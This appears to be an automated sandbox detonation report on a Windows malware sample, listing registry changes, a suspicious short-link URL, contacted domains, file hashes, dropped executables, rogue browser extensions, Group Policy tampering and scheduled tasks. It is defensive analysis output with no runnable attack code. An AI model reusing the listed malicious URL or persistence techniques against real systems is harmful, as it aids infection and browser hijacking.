| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{60D143C1-420A-11EF-B254-46D787DB8171} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2652 wrote to memory of 2968 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2652 wrote to memory of 2968 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2652 wrote to memory of 2968 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2652 wrote to memory of 2968 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://ify.ac/1Ic5
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2652 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 104.21.23.148:443 | ify.ac | tcp |
| US | 104.21.23.148:443 | ify.ac | tcp |
| US | 104.21.23.148:443 | ify.ac | tcp |
| US | 104.21.23.148:443 | ify.ac | tcp |
| US | 104.21.23.148:443 | ify.ac | tcp |
| US | 104.21.23.148:443 | ify.ac | tcp |
| US | 8.8.8.8:53 | oasqi.nxt-psh.com | udp |
| US | 104.21.20.211:443 | oasqi.nxt-psh.com | tcp |
| US | 104.21.20.211:443 | oasqi.nxt-psh.com | tcp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| RU | 87.250.250.119:443 | mc.yandex.ru | tcp |
| RU | 87.250.250.119:443 | mc.yandex.ru | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| RU | 87.250.250.119:443 | mc.yandex.com | tcp |
| RU | 87.250.250.119:443 | mc.yandex.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\0HRATNDC\ify[1].xml
| MD5 | c1ddea3ef6bbef3e7060a1a9ad89e4c5 |
| SHA1 | 35e3224fcbd3e1af306f2b6a2c6bbea9b0867966 |
| SHA256 | b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db |
| SHA512 | 6be8cec7c862afae5b37aa32dc5bb45912881a3276606da41bf808a4ef92c318b355e616bf45a257b995520d72b7c08752c0be445dceade5cf79f73480910fed |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\0HRATNDC\ify[1].xml
| MD5 | 31e82167a127984e1552e429e8bafb5b |
| SHA1 | 8bdec4301f71b61f618c53a27db498c2adea25d9 |
| SHA256 | 9567ae61d59d086b89ea3ee1334b8355e648801c71511cfb53cc938faf79b664 |
| SHA512 | a57554ae763cbe9ea8de215ff67a2b4d42e2b0e581e837152860079dce2d434e1d33471fd646a1d34080cddb9e140a1e813e941fbf4c216cccd4c548bc4b3e12 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\0HRATNDC\ify[1].xml
| MD5 | a4a32d89bb149cfb8c3a9b57feef1198 |
| SHA1 | af60fbdb5af95f35a4a6279e9285588fb606b2d6 |
| SHA256 | 166c7c6428ebb3352d1869915f30f54aa6f3d3f4d188615c783b868d432daa75 |
| SHA512 | 054dd9965eb3d6b28f82cf1d71f8d3c9c1227539689af84ee5142061c3aa348542e1341af2a428d227fed28b1025443fbc52989a15d8c4b285ca72f3cca8bae3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HTBGGANG\favicon[1].ico
| MD5 | de5a68ecf1315791471000eea42de65d |
| SHA1 | 3f3e7239d7ec1702868f51e9d28e528c6c60e984 |
| SHA256 | fb94090003c3fd820119448548cb3f11a37304608d1f7401824111f53cfbe61f |
| SHA512 | 0b5b8b073714ec8e0cd1992d722c669515ce589d14f4dc224e9c1830c4aa8d3473c441758f8128f381607c85acfd015b1fa0f271c4595c33f4d162eab69f2501 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\c2sxdb0\imagestore.dat
| MD5 | c329e35d9f19304afee5019f2813befe |
| SHA1 | 979afe411709dd69970f45163404f1fb1445729e |
| SHA256 | 7219b820b73e666a80869dc37ce9e53b5e26ff14402f065ca0cf2f03e55f5c59 |
| SHA512 | a74d2acb9cbb0467f0418003a98e8c1ec1b43f8ba7877c336eae7575dea12f4ea9d12c96140e2cded9f1223c0d0c8edb8edd27df1e7ca5c17a644cdd57789afc |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\0HRATNDC\ify[1].xml
| MD5 | 484795eff0edbb81604127f71210c046 |
| SHA1 | 21ad4bd1c2dcd51e5654a7ead8f37caec34468de |
| SHA256 | 6e5d93d3f9a8ea3736e584aa5f875e1d27b1f254784413099c739c66d0dc0269 |
| SHA512 | 2639f174549b033776a152460e8c897d3399ac290ffae4f65aa13a0de1612f37a5aa58a0ef8cf9fe1b3fd05e0b93e8f825d8b69c87fdd00ddd2b6d7936cba022 |
C:\Users\Admin\AppData\Local\Temp\Tar63F5.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Temp\Cab63F3.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 549c42d5e5f58aaed4f5eba580245b46 |
| SHA1 | f05d49ec683142c5b61a2e1cef6767fd3fe055db |
| SHA256 | abb37fdc7fe6f391f11f8b33ead032e6ee78352057002a1fdcfef954a1703ae7 |
| SHA512 | 0e7b2cab3838696e0771a1030a5734f88ba66e248b5d94d835ad3dc7422d34be8926838111df8840181df61013f72ece625c76675a525414b93d937b5656ab1b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0617f09453a5d2da658b1127d97a37e5 |
| SHA1 | 22eb95fc45ac0400c0a6edefb53290650603abf2 |
| SHA256 | eb6864356878efc1a27ac55bf91c3a0c9e3a40264d0ebf89846a556863ddbeff |
| SHA512 | 2ad18cad72d49642c89a644c968546a89a1ff233bc6d461b0b9751ab8464f893b0433b057b2e934fcd7ac22334e9f3142fc5fa56a69d9e58254b1bd3a07ef822 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e9e6e727e596602e8913ee96e379e97d |
| SHA1 | 5772c56b4edd6cce3b4794a867f6e414090c2812 |
| SHA256 | 0b35646636421effb1f2184d68b9478193381e0624d7999fa5c2b058a93a2a11 |
| SHA512 | e2375b2f2d336ab5ac2c954cce42d52cac33e25f2e409b2d4f98c815e2dcd5e785ee809fb364234683816680f7a8cdd0b644069d7614acb84e2ead5b90166e35 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5b456c8f7279e5a92dfe9c1408c4171b |
| SHA1 | ff8fa62aedf96461ddf8e86d2c0c5c7a432ad5a1 |
| SHA256 | 3422d846130395a10e0a805163fcadf8b9c66663914644045ace6b9afc7f30ff |
| SHA512 | d09d80a1081ce35f6674fbe19603bb4008e31af4bef34708215a76b9184ee774e0c64166c2aaa574c4417f2bc0459cc69e2ebcc86830bbdf162c8a62621e6db8 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 82acdbabda0a275341fb81c3167c8535 |
| SHA1 | 6c76808b09e3eb4da105c5b4f77679c38c4e8f84 |
| SHA256 | 1d3cce82152a5176f06503e7899f511ebbd50224c43f2d6103f18199c2837dd4 |
| SHA512 | d3321328ffd0bf208cbe8e39fe1076430af03467f6c914d30b12400fbccbcc1ec530d84c8870eb22da75f9700f24ce9a65808a95c6448c7dc640c5c70289ccdf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5dd397f70ad7147840e69d7bbf517886 |
| SHA1 | f9a8c94fa32146601539d25f8986246702a9021e |
| SHA256 | 025e34d76f7d19f1a97b1215a9f5d31b16f484aafbf479734b8fd488ec5533e7 |
| SHA512 | c3e07a04a2a430e9abff696464beefc46de814bef14a50a8a804f9afe19aabab26858e0bda02482598f768ffd1820b5780ea42c8b1ea917cd416421a0bf62bbb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4e24cb5051d2b5c5791c3fabeee27ca0 |
| SHA1 | ba78dbaaa3796d3ef9b739a5a42bd51ca57e5e7b |
| SHA256 | 64d9a30ef3baccc8af6ac1e77f51cbe5be57223be67e071eb7b37e93c97d0e4f |
| SHA512 | a62c891770aae50f214b7b2fdb74bdc33c84afe1f6261c825d6ad69499f3fddea138978099dd5722f84ed042c1ec965ae9d083a6f68a6886c7f1cc859cdc0a62 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 414b35a193817ce2d007918804030d0b |
| SHA1 | e274d0c2e326f9a3f057d5c4422448db3223a14c |
| SHA256 | 74305e7ede1cf000206a04bb780d90548516aac4cb6ded5152553717ceb111a7 |
| SHA512 | 7362c99bfd3232d2376e576089d80fdfb8004fe7c449ac7bb8fe2da214c0204ecfd54a74008a61eb9b4054e2ab072f42dace86452fd43ed1b52f8673e7a5b5ce |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 00a6060bb2acd11a5da42acf6c7000ab |
| SHA1 | d6a0d92f7fe4b0f74ff657b23b27f10d940d53d7 |
| SHA256 | 1b9b0d0e5fa1c55988cd6f9a0f80ee25b543c271ec45b3e98c46a66a5cfaa5b5 |
| SHA512 | 6f3d30b5da12f2ca693885a59f7593b5ea769185e65d48d4253d71da3e9b4ff8271877932221d80263ef449d2d48ccb0b2d95b38e5c6c1358821e07ad622c177 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b35e62cfdbdaa6c81ea1588e39b244d4 |
| SHA1 | ac931f65cbae0c30533c5f5acb18fae18f208bdd |
| SHA256 | 2792692a7b9bc6cd91eff7edaba39a2d471b3fa8791eeebdd05d7c5dbb58e1a2 |
| SHA512 | 81418b0b70780dd43cb0b0aaae9fab2ec7a60f7b4e2e298ccfafa010255ad7c95179ec3380269c66c4778a29ac2eba53065818677e8882937ef5ffe18ff39f87 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-14 17:56
Reported
2024-07-14 18:01
Platform
win10v2004-20240709-en
Max time kernel
294s
Max time network
282s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File created | C:\Program Files (x86)\OJBbginKvssDnbEKbsR\izrRiZa.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File created | C:\Program Files (x86)\hMiQKFvmPLjeC\SrrJrZQ.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File created | C:\Program Files (x86)\AMqhlrBDqRJU2\odjVjmdAyNjvj.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File created | C:\Program Files (x86)\AMqhlrBDqRJU2\FnlJVMA.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File created | C:\Program Files (x86)\OJBbginKvssDnbEKbsR\ejpobva.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File created | C:\Program Files (x86)\hMiQKFvmPLjeC\wpsSjdR.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File created | C:\Program Files (x86)\UQtSSXvqU\SBIkhNc.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File created | C:\Program Files (x86)\UQtSSXvqU\dVmANv.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| File created | C:\Program Files (x86)\ezMWJXFFLyUn\jHWamxc.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\OcPshDNvhDnVmSv.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\MRTHivZIQsRdEanwm.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates physical storage devices
Program crash
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
